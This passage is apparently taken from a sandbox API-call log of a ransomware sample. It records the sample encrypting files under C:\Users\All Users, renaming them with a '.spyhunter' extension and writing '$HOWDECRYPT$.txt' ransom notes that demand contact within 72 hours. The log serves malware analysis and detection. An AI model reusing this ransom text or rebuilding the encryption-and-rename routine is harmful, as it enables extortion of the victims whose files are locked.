help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0145.556] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 61 [0145.556] StrStrW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".txt") returned 0x0 [0145.556] GetProcessHeap () returned 0x2c0000 [0145.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0145.556] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cee94*=0x158, lpOverlapped=0x0) returned 1 [0145.557] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.557] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x25cee94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cee94*=0x158, lpOverlapped=0x0) returned 1 [0145.557] GetProcessHeap () returned 0x2c0000 [0145.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0145.557] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.557] WriteFile (in: hFile=0xb0, lpBuffer=0x25ceed4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee94, lpOverlapped=0x0 | out: lpBuffer=0x25ceed4*, lpNumberOfBytesWritten=0x25cee94*=0x4, lpOverlapped=0x0) returned 1 [0145.557] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee94, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee94*=0x30, lpOverlapped=0x0) returned 1 [0145.557] CloseHandle (hObject=0xb0) returned 1 [0145.558] GetProcessHeap () returned 0x2c0000 [0145.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.558] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.spyhunter") returned 71 [0145.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.spyhunter" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.spyhunter")) returned 1 [0145.559] GetProcessHeap () returned 0x2c0000 [0145.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.568] GetProcessHeap () returned 0x2c0000 [0145.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.568] GetProcessHeap () returned 0x2c0000 [0145.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030ab0 | out: hHeap=0x2c0000) returned 1 [0145.568] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceed0 | out: pbBuffer=0x25ceed0) returned 1 [0145.568] GetProcessHeap () returned 0x2c0000 [0145.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.571] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceec8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceec8*=0x30) returned 1 [0145.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.615] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 62 [0145.615] StrStrW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0145.615] GetProcessHeap () returned 0x2c0000 [0145.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.615] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cee8c*=0x15e, lpOverlapped=0x0) returned 1 [0145.616] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.616] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x25cee8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cee8c*=0x15e, lpOverlapped=0x0) returned 1 [0145.616] GetProcessHeap () returned 0x2c0000 [0145.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.616] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.616] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceecc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee8c, lpOverlapped=0x0 | out: lpBuffer=0x25ceecc*, lpNumberOfBytesWritten=0x25cee8c*=0x4, lpOverlapped=0x0) returned 1 [0145.616] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee8c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee8c*=0x30, lpOverlapped=0x0) returned 1 [0145.616] CloseHandle (hObject=0x9c) returned 1 [0145.616] GetProcessHeap () returned 0x2c0000 [0145.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.616] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.spyhunter") returned 72 [0145.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.spyhunter" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn.spyhunter")) returned 1 [0145.617] GetProcessHeap () returned 0x2c0000 [0145.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.617] GetProcessHeap () returned 0x2c0000 [0145.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.617] GetProcessHeap () returned 0x2c0000 [0145.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30309e8 | out: hHeap=0x2c0000) returned 1 [0145.617] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceed0 | out: pbBuffer=0x25ceed0) returned 1 [0145.617] GetProcessHeap () returned 0x2c0000 [0145.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.618] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceec8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceec8*=0x30) returned 1 [0145.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.625] GetProcessHeap () returned 0x2c0000 [0145.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.625] GetProcessHeap () returned 0x2c0000 [0145.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efeac0 | out: hHeap=0x2c0000) returned 1 [0145.625] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceec8 | out: pbBuffer=0x25ceec8) returned 1 [0145.625] GetProcessHeap () returned 0x2c0000 [0145.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.625] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceec0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceec0*=0x30) returned 1 [0145.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.628] GetProcessHeap () returned 0x2c0000 [0145.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.628] GetProcessHeap () returned 0x2c0000 [0145.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe6e0 | out: hHeap=0x2c0000) returned 1 [0145.628] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceec8 | out: pbBuffer=0x25ceec8) returned 1 [0145.628] GetProcessHeap () returned 0x2c0000 [0145.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.629] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceec0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceec0*=0x30) returned 1 [0145.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.635] GetProcessHeap () returned 0x2c0000 [0145.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.635] GetProcessHeap () returned 0x2c0000 [0145.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe300 | out: hHeap=0x2c0000) returned 1 [0145.635] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceec0 | out: pbBuffer=0x25ceec0) returned 1 [0145.635] GetProcessHeap () returned 0x2c0000 [0145.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.635] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceeb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceeb8*=0x30) returned 1 [0145.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.640] GetProcessHeap () returned 0x2c0000 [0145.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.640] GetProcessHeap () returned 0x2c0000 [0145.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efdf20 | out: hHeap=0x2c0000) returned 1 [0145.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.641] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.641] WriteFile (in: hFile=0x178, lpBuffer=0x25cedf3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x25cedf3*, lpNumberOfBytesWritten=0x25cef1c*=0x127, lpOverlapped=0x0) returned 1 [0145.641] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.641] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef1c*=0x2ac, lpOverlapped=0x0) returned 1 [0145.642] CloseHandle (hObject=0x178) returned 1 [0145.642] GetProcessHeap () returned 0x2c0000 [0145.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffde28 | out: hHeap=0x2c0000) returned 1 [0145.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.642] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.642] WriteFile (in: hFile=0x178, lpBuffer=0x25cedef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef18, lpOverlapped=0x0 | out: lpBuffer=0x25cedef*, lpNumberOfBytesWritten=0x25cef18*=0x127, lpOverlapped=0x0) returned 1 [0145.643] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.643] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef18, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef18*=0x2ac, lpOverlapped=0x0) returned 1 [0145.643] CloseHandle (hObject=0x178) returned 1 [0145.643] GetProcessHeap () returned 0x2c0000 [0145.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030858 | out: hHeap=0x2c0000) returned 1 [0145.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.644] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.644] WriteFile (in: hFile=0x178, lpBuffer=0x25cedeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x25cedeb*, lpNumberOfBytesWritten=0x25cef14*=0x127, lpOverlapped=0x0) returned 1 [0145.645] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.645] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef14*=0x2ac, lpOverlapped=0x0) returned 1 [0145.645] CloseHandle (hObject=0x178) returned 1 [0145.645] GetProcessHeap () returned 0x2c0000 [0145.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6e18 | out: hHeap=0x2c0000) returned 1 [0145.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.645] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.645] WriteFile (in: hFile=0x178, lpBuffer=0x25cede7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef10, lpOverlapped=0x0 | out: lpBuffer=0x25cede7*, lpNumberOfBytesWritten=0x25cef10*=0x127, lpOverlapped=0x0) returned 1 [0145.646] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.646] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef10, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef10*=0x2ac, lpOverlapped=0x0) returned 1 [0145.647] CloseHandle (hObject=0x178) returned 1 [0145.647] GetProcessHeap () returned 0x2c0000 [0145.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7208 | out: hHeap=0x2c0000) returned 1 [0145.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.647] GetProcessHeap () returned 0x2c0000 [0145.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffbe00 | out: hHeap=0x2c0000) returned 1 [0145.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.648] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.648] WriteFile (in: hFile=0x178, lpBuffer=0x25ceddf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef08, lpOverlapped=0x0 | out: lpBuffer=0x25ceddf*, lpNumberOfBytesWritten=0x25cef08*=0x127, lpOverlapped=0x0) returned 1 [0145.648] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.648] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef08*=0x2ac, lpOverlapped=0x0) returned 1 [0145.649] CloseHandle (hObject=0x178) returned 1 [0145.649] GetProcessHeap () returned 0x2c0000 [0145.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffdd68 | out: hHeap=0x2c0000) returned 1 [0145.649] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceea8 | out: pbBuffer=0x25ceea8) returned 1 [0145.649] GetProcessHeap () returned 0x2c0000 [0145.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.649] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceea0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceea0*=0x30) returned 1 [0145.649] CreateFileW 